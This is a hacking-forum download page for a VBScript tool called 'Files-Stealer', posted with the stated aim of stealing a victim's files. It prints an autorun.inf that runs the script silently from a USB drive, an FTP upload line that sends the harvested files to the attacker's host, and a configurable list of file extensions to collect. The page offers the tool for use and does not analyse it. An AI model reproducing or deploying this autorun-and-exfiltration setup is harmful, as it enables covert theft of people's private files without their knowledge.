Welcome, Guest | RSS
Thursday, 03.28.2024, 5:07 PM
Main » Files » Hacking tools

Files-Stealer
[ · Download from mirror () ] 11.25.2009, 3:45 PM
Hi ! Black Hat today i want to share with you my script made in Vbscript.
There are 2 ways to use it.

The First way: If you want to use it for your personal backup data which you have fixed what Fiels extension this script can scan for it in all Drives. And listing their names and collect their paths in a File.txt and copy them in a special folder.
after it compress in a rar file to upload it in your Host Ftp

The second way : like the First Way but To steal Files of your victim computer.
so you can copy this script in the root of your USB-Drive and create an Autorun.inf and copy and paste this code into it.


Code:
[autorun]
shellexecute = Files-Stealer.vbs
shell\open=open
shell\Open\Command= wscript Files-Stealer.vbs
shell\open\Default=1
shell\explore=explorer
shell\explore\Command= wscript Files-Stealer.vbs

Here i show you which lines you can modify in the source for your personal use.

Code:
FTPUpload ("YourHostFTP","YourLoginFTP","YourPassword",targetfolder,sRemotePath)

Code:
'#Affectations
Set oDic = CreateObject("scripting.dictionary")
oDic.Add "docx",1'here you can add any extention of the files which this script can scan exemple .docx
oDic.Add "cmd",1'here you can add any extention of the files which this script can scan exemple .cmd
oDic.Add "vbs",1'here you can add any extention of the files which this script can scan exemple .vbs  
oDic.Add "mp3",1'here you can add any extention of the files which this script can scan exemple .mp3 etc.......
Category: Hacking tools | Added by: Kapral | Tags: tool, hack, file, stealer
Views: 1009 | Downloads: 279 | Rating: 0.0/0
Total comments: 0
Name *:
Email *:
Code *:
Copyright MyCorp © 2024 | Free website builderuCoz